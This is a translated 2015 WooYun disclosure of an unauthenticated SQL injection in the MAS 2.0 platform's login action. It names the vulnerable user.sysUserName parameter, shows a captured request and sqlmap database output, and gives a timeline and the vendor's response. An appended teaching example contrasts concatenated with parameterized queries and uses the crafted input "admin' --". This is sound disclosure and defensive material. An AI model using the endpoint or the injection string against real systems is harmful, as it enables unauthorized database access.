
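Vulnerability Summary

Bug ID: wooyun-2015-0134947

Title: Generic SQL injection vulnerability in the 无限立通 (Wuxian Litong) MAS proxy server (no login required, DBA privileges)

Vendor: 北京无限立通通讯技术有限责任公司

Author: 路人甲

Submitted: 2015-08-20 10:27

Fixed: 2015-11-19 18:28

Published: 2015-11-19 18:28

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org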



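Vulnerability Details

Disclosure status:

2015-08-20: Details sent to the vendor; waiting for the vendor to respond
2015-08-21: CNCERT (National Internet Emergency Center) has not yet been able to reach the organization concerned; details disclosed only to the reporting body
2015-08-24: Details opened to third-party security partners
2015-10-15: Details disclosed to core white hats and experts in related fields
2015-10-25: Details disclosed to regular white hats
2015-11-04: Details disclosed to trainee white hats
2015-11-19: Details disclosed to the public

Brief description:

Affects many government bodies, China Mobile, and others. Y_Y

Detailed description:

The "MAS2.0综合信息平台" (MAS 2.0 Integrated Information Platform) developed by 无限立通 has a SQL injection vulnerability that can be reached without logging in.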

POST /userLoginAction.action HTTP/1.1
Host: **.**.**.**
Content-Length: 69
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20120101 Firefox/33.0
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=663BFE493B61E5943595E0D931B0CC77

failReason=&user.sysUserName=admin&user.sysUserPassword=admin&x=0&y=0


Caused by insufficient validation of the user.sysUserName parameter.

Proof of vulnerability:


Database: mas22
[97 tables]
[02:57:11] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\**.**.**.**'


Cases:


Fix:

Filtering

Copyright notice: when reposting, please credit the source: 路人甲@乌云
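
The fix above is given as filtering. The usual way to keep a login field such as user.sysUserName from being parsed as SQL is to bind it as a query parameter. The following is an added example, not code from the report or from the MAS product: the table, function names and credentials are hypothetical and constructed, and Python's sqlite3 stands in for the real database.

```python
import hashlib
import hmac
import sqlite3

SALT = b"constructed-demo-salt"  # fixed only so the example is reproducible

def pw_hash(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 50_000).hex()

def make_db():
    # Hypothetical stand-in table; the real MAS schema and server-side
    # login code are not shown in the report.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE demo_user (name TEXT PRIMARY KEY, pw_hash TEXT)")
    db.execute("INSERT INTO demo_user VALUES (?, ?)",
               ("admin", pw_hash("constructed-secret")))
    return db

def login_concatenated(db, name, password):
    """Weak form: request values are pasted into the SQL text."""
    sql = ("SELECT name FROM demo_user WHERE name = '" + name +
           "' AND pw_hash = '" + pw_hash(password) + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, name, password):
    """Hardened form: the value is bound and never parsed as SQL."""
    row = db.execute("SELECT pw_hash FROM demo_user WHERE name = ?",
                     (name,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[0], pw_hash(password))

# Constructed input: a quote and a comment marker alter the statement's
# structure in the concatenated form only.
CRAFTED_NAME = "admin' --"

if __name__ == "__main__":
    db = make_db()
    for fn in (login_concatenated, login_parameterized):
        print(fn.__name__,
              "valid login:", fn(db, "admin", "constructed-secret"),
              "crafted name:", fn(db, CRAFTED_NAME, "wrong"))
```

With binding in place, the crafted name is only ever compared as a literal string, so no character filtering is needed for the query to stay intact.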


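Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2015-08-21 18:26

Vendor reply:

CNVD confirmed and reproduced the reported issue. It has been passed via CNCERT to China Mobile Communications Group Co., Ltd., which will coordinate with the website administrators on follow-up handling.

Latest status:

None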